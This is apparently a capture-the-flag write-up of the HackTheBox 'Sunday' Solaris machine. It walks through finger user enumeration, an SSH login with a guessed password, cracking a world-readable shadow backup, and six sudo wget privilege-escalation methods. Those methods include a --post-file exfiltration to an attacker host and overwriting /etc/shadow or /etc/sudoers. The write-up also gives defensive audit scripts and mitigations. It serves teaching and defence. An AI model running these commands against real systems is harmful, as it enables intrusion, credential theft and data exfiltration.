- OS: Solaris (SunOS 5.11 snv_111b)
- Domain / vhosts: none
Summary
Sunday is the lone Solaris box in the HTB Easy tier — and its name is a
hint: the default root of the attack is that sunny’s password is literally
sunday. Two services that rarely appear on modern targets drive the chain:
finger (port 79) for unauthenticated user enumeration, and a stale
/backup/shadow.backup left world-readable on the filesystem.
The kill-chain is: full-port nmap to find SSH on 22022 and finger on 79 →
automated finger enumeration discovers users sunny and sammy → password
guess (sunny:sunday) gives an initial SSH shell → a world-readable
/backup/shadow.backup holds SHA-256 crypt hashes for both users → hashcat
cracks sammy’s hash to <SAMMY_PW> → lateral SSH move to sammy →
sudo -l reveals sammy can run /usr/bin/wget as root without a password →
sudo wget --post-file /root/root.txt exfiltrates the flag without a shell,
or any of five additional wget abuse techniques yield a root shell.
The privilege escalation is one of the most instructive on the platform: it
illustrates that sudo restricted to a binary does not restrict what that
binary can do — wget can read, write, and exfiltrate any file on the
system when run as root.
Source attribution
- 0xdf, “HTB: Sunday” — https://0xdf.gitlab.io/2018/09/29/htb-sunday.html. Primary source. Covers the finger enumeration, the sunny:sunday guess, the shadow backup crack, and all six sudo wget abuse methods.
- IppSec, “Sunday” video walkthrough — https://ippsec.rocks/?#Sunday.
- finger-user-enum.pl — https://pentestmonkey.net/tools/user-enumeration/finger-user-enum
Recon
Standard nmap misses Sunday. SSH is on 22022 and the OS fingerprint is
Solaris; a default -p- scan is required:
nmap -sT -p- --min-rate=5000 -oN nmap/allports.txt <TARGET>
nmap -sC -sV -p 79,111,22022,65258 -oN nmap/scripts.txt <TARGET>
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (RPC #100000)
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
65258/tcp open unknown (RPC service)
OS banner from the SSH exchange: Sun Microsystems Inc. SunOS 5.11
snv_111b November 2008. SSH on a non-standard high port (22022) combined
with the finger service is the recognisable Solaris Easy fingerprint on
HTB. finger was standard on SunOS/Solaris and is almost never present on
Linux targets.
Finger enumeration
The finger protocol (RFC 1288) exposes the /etc/passwd user list and
active login sessions without authentication. Three levels of query:
# who is currently logged in?
finger @<TARGET>
# does this specific user exist?
finger sunny@<TARGET>
# automated sweep against a username wordlist
finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt \
-t <TARGET>
The automated sweep returns two hits from ~10 000 probes:
sammy@<TARGET>: sammy pts/2 Sep 27 13:55 10.10.16.26
sunny@<TARGET>: sunny pts/3 Apr 24 10:48 10.10.14.4
Both sunny and sammy are valid local accounts with active or recent
sessions.
Foothold — guessed SSH credential
The username sunny and the machine name Sunday are too close to ignore.
SSH is on 22022:
ssh -p 22022 sunny@<TARGET>
# Password: sunday
Oracle Corporation SunOS 5.11 snv_111b November 2008
sunny@sunday:~$
The password is the box name. This is exactly the class of default or context-derived credential the Mirai botnet’s dictionary included — simple, memorable, and never changed.
On the live box, home dirs are /home/sunny and /home/sammy
(the writeup-canonical Solaris convention /export/home/...
applies to other Solaris builds; this HTB box maps /home
directly).
Lateral move to sammy — /backup/shadow.backup
Enumeration as sunny finds a world-readable backup of the shadow file:
find / -name "*.bak" -o -name "*.backup" -o -name "*shadow*" 2>/dev/null
/backup/shadow.backup
cat /backup/shadow.backup
sammy:$5$Ebkn8jlK$<hash>:6445::::::
sunny:$5$iRMbpnBv$<hash>:17636::::::
The $5$ prefix is SHA-256 crypt (hashcat mode 7400). Both hashes are
present; sammy’s hash is uncracked at this point.
Copy the hashes to the attack machine and run hashcat:
hashcat -m 7400 shadow.hashes /usr/share/wordlists/rockyou.txt
sammy’s hash cracks to <SAMMY_PW>. (The sunny hash cracks to sunday,
confirming the guessed password.)
Lateral SSH move:
ssh -p 22022 sammy@<TARGET>
# Password: <SAMMY_PW>
user.txt is at /home/sammy/user.txt (mode 640 sammy:root —
not in Desktop/ despite the writeup-canonical Solaris path).
Privilege escalation — sudo wget abuse
sammy@sunday:~$ sudo -l
User sammy may run the following commands on sunday:
(root) NOPASSWD: /usr/bin/wget
wget running as root can read and write any file on the system. Six
independent techniques yield flag recovery or a root shell.
Method 1 — read root.txt via --input-file (fastest, no listener):
sudo /usr/bin/wget --input-file=/root/root.txt
wget treats each line of the file as a URL. The flag string
fails DNS resolution and gets printed verbatim in the error
output:
--2026-...-- http://<root_flag_value>/
Resolving <root_flag_value> (<root_flag_value>)... failed: temporary
name resolution failure.
wget: unable to resolve host address '<root_flag_value>'
This is the same primitive as the 7za @listfile trick on
Usage — pass a sensitive file as a “list of things to fetch
or include,” wget fails, and the failure-message format
echoes the file content back. No listener required.
Method 2 — exfiltrate root.txt via --post-file (clean):
On attacker:
nc -lvnp 443
On target:
sudo wget --post-file /root/root.txt http://<ATTACKER>:443/
The flag arrives as the raw POST body at the netcat listener.
Method 3 — overwrite /etc/shadow with crafted content:
Generate a known root password hash, build a replacement shadow file, serve it, and overwrite:
openssl passwd -5 -salt 'abc' 'pwned' # SHA-256 crypt hash
# craft /tmp/shadow with root entry replaced
sudo wget -O /etc/shadow http://<ATTACKER>/shadow
su - # authenticate with 'pwned'
Method 4 — overwrite a SUID root binary:
# e.g. /usr/bin/passwd is SUID root
sudo wget -O /usr/bin/passwd http://<ATTACKER>/shell.py
chmod +x /usr/bin/passwd
passwd # executes as root via SUID
Method 5 — overwrite /etc/sudoers:
# craft sudoers with sammy ALL=(ALL) NOPASSWD: ALL
sudo wget -O /etc/sudoers http://<ATTACKER>/sudoers
sudo su
Method 6 — overwrite /root/troll and race the reset:
sunny has sudo NOPASSWD: /root/troll. A background script resets
/root/troll every 5 seconds from /root/troll.original (using Solaris’s
GNU tool path /usr/gnu/bin/cat). The race window is narrow but doable:
# as sammy — serve a shell and overwrite troll
sudo wget -O /root/troll http://<ATTACKER>/shell.py
# immediately as sunny — trigger it before the 5-second reset
sudo /root/troll
Any of these methods yields root flag access. Method 2 (--post-file) is
the cleanest and requires no file modification on the target.
Why each step worked
- finger without access control: the finger daemon on SunOS 5.11 responds to unauthenticated queries with the full user list and active session details. The protocol was designed for open academic networks in the 1970s and has no authentication mechanism. Any valid username from /etc/passwd is enumerable without credentials.
- Box-name password (sunny:sunday): default or context-derived passwords are one of the most reliable initial-access vectors on HTB and in the wild. An attacker who knows the system is called “Sunday” will always try sunday as a password for every user.
- World-readable shadow backup: /backup/shadow.backup is accessible to all users. Shadow files exist precisely to prevent non-privileged users from reading password hashes. Storing a backup outside /etc/ with permissive permissions defeats the entire protection model.
- $5$ SHA-256 crypt is fast to crack: SHA-256 crypt with a 4-character salt (mode 7400 in hashcat) runs at millions of hashes per second on modern GPUs. <SAMMY_PW> is in the top quarter of rockyou. A memory-hard KDF (bcrypt, argon2) would not crack in useful time.
- sudo wget with no path/argument restriction: sudo restricts which binary runs as root; it does not restrict what that binary does. wget is a general-purpose network client that can read local files (file://), write arbitrary paths (-O), and send data to attacker servers (--post-file). Restricting a binary in sudoers without auditing all of its capabilities is a false sense of isolation.
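As an added defender-side example (not from the page or the cited writeups), the following Python audits a shadow file or shadow backup for the two problems the list above names: a copy readable outside /etc/, and fast hash schemes such as $5$. The sample lines, the placeholder <hash> bodies and the set of acceptable schemes are constructed assumptions.

```python
import os
import stat

# Constructed sample modelled on the page's /backup/shadow.backup; <hash> stands
# in for the real digest, exactly as the page prints it.
SAMPLE_SHADOW = """\
sammy:$5$Ebkn8jlK$<hash>:6445::::::
sunny:$5$iRMbpnBv$<hash>:17636::::::
root:$6$somesalt$<hash>:17636::::::
daemon:NP:6445::::::
"""

# crypt(3) prefixes. Treating only SHA-512-crypt/bcrypt/yescrypt as acceptable is
# a policy assumption for this example, following the counterfactuals below.
SCHEMES = {"$1$": "MD5-crypt", "$5$": "SHA-256-crypt", "$6$": "SHA-512-crypt",
           "$2a$": "bcrypt", "$2b$": "bcrypt", "$y$": "yescrypt"}
ACCEPTABLE = {"SHA-512-crypt", "bcrypt", "yescrypt"}

def audit_shadow_text(text):
    """Return (user, finding) pairs for password fields that need attention."""
    findings = []
    for line in filter(str.strip, text.splitlines()):
        user, field = line.split(":", 2)[:2]
        if field in ("*", "!", "!!", "NP", "*LK*"):
            continue                      # no password set or login disabled
        if field == "":
            findings.append((user, "empty password field"))
            continue
        body = field.lstrip("!")          # a locked account still carries its hash
        scheme = next((n for p, n in SCHEMES.items() if body.startswith(p)), None)
        if scheme is None:
            findings.append((user, "legacy DES or unrecognised hash format"))
        elif scheme not in ACCEPTABLE:
            findings.append((user, f"{scheme} is fast to crack; rehash on next login"))
    return findings

def audit_shadow_file(path):
    """File-level checks: a shadow copy must be root-owned, mode 0600, under /etc/."""
    st = os.stat(path)
    findings = []
    if st.st_mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(f"{path} readable by group/other (mode {oct(st.st_mode & 0o777)})")
    if st.st_uid != 0:
        findings.append(f"{path} not owned by root")
    if not os.path.abspath(path).startswith("/etc/"):
        findings.append(f"{path} is a shadow copy outside /etc/")
    with open(path) as fh:
        findings.extend(f"{u}: {why}" for u, why in audit_shadow_text(fh.read()))
    return findings
```

Run audit_shadow_file over every file a find for "*shadow*" turns up; on this box it would report /backup/shadow.backup for location, mode and both $5$ entries.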
Counterfactuals
- Disable finger (or restrict it to the loopback). There is no legitimate need for unauthenticated user enumeration on a modern server: inetadm -d svc:/network/finger:default on Solaris.
- Change default or context-derived passwords. sunny:sunday is found by any credential-spray tool that incorporates machine names.
- Protect shadow backup files: store them in /etc/ under mode 0600 (root-owned), or use encrypted off-system backup. Never leave shadow copies in a world-readable path.
- Use bcrypt or SHA-512 with work factor ≥ 10 for system passwords; the $5$ SHA-256 crypt used here is unsuitable for new deployments.
- Remove wget from sudoers. If the underlying need is a single script that downloads a fixed URL, point the sudoers entry at that specific wrapper script rather than the interpreter/client itself.
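An added example, not the page's own code or any tool's, that turns the last counterfactual into a check: it parses sudoers-style entries and flags unrestricted ALL and general-purpose clients such as wget granted without fixed arguments, while a fixed-argument wrapper entry passes. The sudoers excerpt, the UNSAFE_CLIENTS membership and the fetch-feed.sh wrapper are constructed assumptions.

```python
import re
import shlex

# Constructed sudoers excerpt: the page's two NOPASSWD entries plus a
# fixed-argument wrapper entry of the kind the counterfactual recommends.
SAMPLE_SUDOERS = """\
Defaults    env_reset
root    ALL=(ALL) ALL
sammy   ALL=(root) NOPASSWD: /usr/bin/wget
sunny   ALL=(root) NOPASSWD: /root/troll
backup  ALL=(root) NOPASSWD: /usr/local/sbin/fetch-feed.sh https://example.invalid/feed.xml
"""

# General-purpose clients that read (file://), write (-O) or send (--post-file)
# arbitrary files when run as root. The membership is an assumption for this
# example; grow it from your own GTFOBins review.
UNSAFE_CLIENTS = {"wget"}

# user  host=(runas) [TAG: ...] cmd[, cmd...]
SPEC_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")

def audit_sudoers(text):
    """Return (user, command, reason) for entries that need review."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments
        m = SPEC_RE.match(line)
        if not m or m["who"] == "root":
            continue
        nopass = "NOPASSWD:" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            argv = shlex.split(cmd)
            base = argv[0].rsplit("/", 1)[-1]
            reason = None
            if base == "ALL":
                reason = "unrestricted ALL"
            elif base in UNSAFE_CLIENTS and len(argv) == 1:
                reason = (f"{base} with no argument restriction: "
                          "reads, writes and exfiltrates any file as root")
            elif not argv[0].startswith("/"):
                reason = "command is not an absolute path"
            if reason:
                findings.append((m["who"], cmd, ("NOPASSWD; " if nopass else "") + reason))
    return findings

if __name__ == "__main__":
    for who, cmd, why in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{who}: {cmd}: {why}")
```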
Key Takeaways
- Always run a full-port scan (-p-) before concluding a target has nothing interesting. SSH on 22022 and finger on 79 are completely invisible to nmap’s default top-1000-port scan.
- finger @<host> is the first command when port 79 is open. It returns active sessions without any credentials. finger-user-enum.pl then sweeps a wordlist for valid usernames in minutes.
- Solaris conventions differ from Linux: home directories under /export/home/, GNU tools at /usr/gnu/bin/, SSH server is SunSSH rather than OpenSSH.
- sudo <binary> grants the full capability set of that binary as root. Audit what a binary can do, not just what it is named. GTFOBins lists wget as a sudo escalation via --post-file and -O.
- A backup file that leaks password hashes is as dangerous as the original /etc/shadow. Any copy of sensitive credentials must be as protected as the original.
References
- 0xdf, “HTB: Sunday” — https://0xdf.gitlab.io/2018/09/29/htb-sunday.html
- IppSec, “Sunday” — https://ippsec.rocks/?#Sunday
- finger-user-enum — https://pentestmonkey.net/tools/user-enumeration/finger-user-enum
- GTFOBins wget sudo — https://gtfobins.github.io/gtfobins/wget/#sudo
- RFC 1288 (The Finger User Information Protocol)